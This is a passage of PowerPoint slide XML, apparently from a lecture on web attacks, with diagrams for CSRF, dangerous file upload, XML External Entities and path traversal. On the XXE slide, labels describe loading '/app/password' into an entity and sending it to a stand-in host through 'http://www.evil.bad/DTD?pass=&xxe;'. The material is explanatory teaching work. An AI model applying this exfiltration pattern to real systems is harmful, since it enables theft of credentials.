        <p:spPr>
          <a:xfrm>
            <a:off x="3973320" y="2496960"/>
            <a:ext cx="568800" cy="708840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="253" name="Curved Connector 43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="247" idx="1"/>
            <a:endCxn id="254" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1591560" y="2487240"/>
            <a:ext cx="718560" cy="2257560"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="TextBox 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1742400" y="3515040"/>
            <a:ext cx="1050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Data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6" name="Picture 53" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1233000" y="1561320"/>
            <a:ext cx="718200" cy="925920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="TextBox 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838080" y="1224000"/>
            <a:ext cx="1507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www.evil.bad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6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2069280" y="1383120"/>
            <a:ext cx="1605240" cy="1950120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic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1176480" y="361440"/>
            <a:ext cx="10515240" cy="54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Cross-Site Request Forgery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0" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921680" y="1038960"/>
            <a:ext cx="1950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www.trusted.good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1" name="Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4386240" y="4321440"/>
            <a:ext cx="952200" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="262" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="999720" y="4139280"/>
            <a:ext cx="1769040" cy="1498680"/>
            <a:chOff x="999720" y="4139280"/>
            <a:chExt cx="1769040" cy="1498680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="263" name="Graphic 17" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1150920" y="413928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4" name="Graphic 18" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1486440" y="432288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5" name="TextBox 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="999720" y="5274000"/>
              <a:ext cx="17690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66" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4386240" y="5233680"/>
            <a:ext cx="1050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7" name="Curved Connector 29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="261" idx="0"/>
            <a:endCxn id="268" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="3143160" y="2602440"/>
            <a:ext cx="1963800" cy="1474920"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="269" name="Graphic 34" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="-3" t="-155" r="83693" b="49656"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2814840" y="1993680"/>
            <a:ext cx="572760" cy="729000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="270" name="Curved Connector 43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="264" idx="3"/>
            <a:endCxn id="261" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2438640" y="4797360"/>
            <a:ext cx="1947960" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25009"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="70ad47">
                <a:lumMod val="50000"/>
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="TextBox 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3149280" y="4430880"/>
            <a:ext cx="1050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$$$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2" name="Picture 21" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="69000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5540400" y="1383120"/>
            <a:ext cx="1605240" cy="1950120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5540400" y="1068120"/>
            <a:ext cx="1950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www.bank.com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4" name="Curved Connector 26"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="269" idx="1"/>
            <a:endCxn id="264" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="10800000">
            <a:off x="1962360" y="2358000"/>
            <a:ext cx="852840" cy="1965240"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="70ad47">
                <a:lumMod val="50000"/>
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="275" name="Curved Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="272" idx="1"/>
            <a:endCxn id="258" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3674160" y="2358000"/>
            <a:ext cx="1866240" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="70ad47">
                <a:lumMod val="50000"/>
                <a:alpha val="62000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3823560" y="1959840"/>
            <a:ext cx="1950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/transferMoney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be 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2804400" y="1536120"/>
            <a:ext cx="1299960" cy="1924200"/>
          </a:xfrm>
          <a:prstGeom prst="cube">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst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850680" y="615240"/>
            <a:ext cx="10515240" cy="54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Upload of Dangerous File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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2530440" y="1182240"/>
            <a:ext cx="1950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www.file.server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0" name="Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094280" y="4316400"/>
            <a:ext cx="952200" cy="952200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="281" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1432080" y="4134600"/>
            <a:ext cx="1769040" cy="1498320"/>
            <a:chOff x="1432080" y="4134600"/>
            <a:chExt cx="1769040" cy="1498320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="282" name="Graphic 17" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1583280" y="413460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3" name="Graphic 18" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1918440" y="431784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4" name="TextBox 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1432080" y="5268960"/>
              <a:ext cx="17690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85" name="TextBox 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4045320" y="5250240"/>
            <a:ext cx="1050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86" name="Curved Connector 28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="280" idx="1"/>
            <a:endCxn id="287" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3218040" y="2898720"/>
            <a:ext cx="876240" cy="1893600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 130538"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="288" name="Graphic 34" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="67105" t="53204" r="16431" b="-2165"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3218400" y="2521080"/>
            <a:ext cx="619200" cy="756360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206520" y="3516120"/>
            <a:ext cx="11372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Malicious Web Script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0" name="Graphic 22" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="16250" t="49339" r="67318" b="232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3001320" y="1847160"/>
            <a:ext cx="510480" cy="643680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="291" name="Curved Connector 27"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="282" idx="0"/>
            <a:endCxn id="290" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1" rot="5400000">
            <a:off x="1547280" y="2680920"/>
            <a:ext cx="1965960" cy="942480"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="e7e6e6">
                <a:lumMod val="75000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="TextBox 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333080" y="2136240"/>
            <a:ext cx="1512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Confidential Docs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93" name="Curved Connector 41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="277" idx="1"/>
            <a:endCxn id="280" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="16200000">
            <a:off x="3346920" y="3092760"/>
            <a:ext cx="1656000" cy="791280"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000"/>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="294" name="Graphic 45" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="16250" t="49339" r="67318" b="232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4376160" y="2963880"/>
            <a:ext cx="232200" cy="292680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="295" name="Graphic 51" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect l="16250" t="49339" r="67318" b="232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4608720" y="3684960"/>
            <a:ext cx="232200" cy="292680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="296" name="Graphic 52" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:srcRect l="16250" t="49339" r="67318" b="232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2011680" y="3525120"/>
            <a:ext cx="232200" cy="292680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="297" name="Graphic 53" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:srcRect l="16250" t="49339" r="67318" b="232"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2217600" y="2794320"/>
            <a:ext cx="232200" cy="29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46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2643480" y="2501640"/>
            <a:ext cx="4254120" cy="615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9900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:alpha val="23000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt; /&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="19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Rectangle 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2805480" y="3013920"/>
            <a:ext cx="3994560" cy="2324520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ff0000">
              <a:alpha val="3000"/>
            </a:srgbClr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1542600" y="443160"/>
            <a:ext cx="10515240" cy="54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XML External Entities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01" name="Group 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1645560" y="4703760"/>
            <a:ext cx="1050120" cy="1591560"/>
            <a:chOff x="1645560" y="4703760"/>
            <a:chExt cx="1050120" cy="1591560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="302" name="Graphic 16" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1694880" y="470376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TextBox 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1645560" y="5657040"/>
              <a:ext cx="105012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04" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354320" y="2352600"/>
            <a:ext cx="1626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XML Processor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5" name="Picture 21" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811880" y="1484280"/>
            <a:ext cx="718200" cy="872640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="TextBox 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2932560" y="3267720"/>
            <a:ext cx="374076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Include </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0432ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/app/password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file as </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>&amp;xxe;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</a:rPr>
              <a:t>Link to: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0432ff"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>http://www.evil.bad/DTD?pass=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>&amp;xxe;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07" name="Curved Connector 32"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="305" idx="3"/>
            <a:endCxn id="308" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2530080" y="1917720"/>
            <a:ext cx="2454480" cy="3240"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25011"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="76000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="TextBox 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2486520" y="1460520"/>
            <a:ext cx="3296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/DTD?pass=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-CA" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="c00000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>jmttN9YC4bK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0" name="Picture 38" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4984200" y="1454760"/>
            <a:ext cx="718200" cy="925920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="TextBox 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4589640" y="2412360"/>
            <a:ext cx="1507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www.evil.bad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2" name="Curved Connector 50"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="302" idx="0"/>
            <a:endCxn id="304" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="1312560" y="3845520"/>
            <a:ext cx="1713240" cy="3960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25010"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="44450">
            <a:solidFill>
              <a:srgbClr val="c00000">
                <a:alpha val="56000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="TextBox 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3862440" y="5338800"/>
            <a:ext cx="1918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XML Document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icture 81" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="80808" t="61898" r="2090" b="6902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567800" y="2197800"/>
            <a:ext cx="348840" cy="449640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="315" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="53000"/>
          </a:blip>
          <a:srcRect l="80808" t="32963" r="2090" b="37635"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3382560" y="1671840"/>
            <a:ext cx="874800" cy="1062720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic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1228680" y="790200"/>
            <a:ext cx="10515240" cy="54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Path Traversal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7" name="TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4173120" y="1807560"/>
            <a:ext cx="2765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file.txt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8" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2874960" y="4257000"/>
            <a:ext cx="1769040" cy="1498320"/>
            <a:chOff x="2874960" y="4257000"/>
            <a:chExt cx="1769040" cy="1498320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="319" name="Graphic 17" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3026160" y="425700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0" name="Graphic 18" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3361320" y="444024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1" name="TextBox 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2874960" y="5391360"/>
              <a:ext cx="17690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22" name="Group 63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1228680" y="4514040"/>
            <a:ext cx="1050120" cy="1539720"/>
            <a:chOff x="1228680" y="4514040"/>
            <a:chExt cx="1050120" cy="1539720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="323" name="Graphic 16" descr=""/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
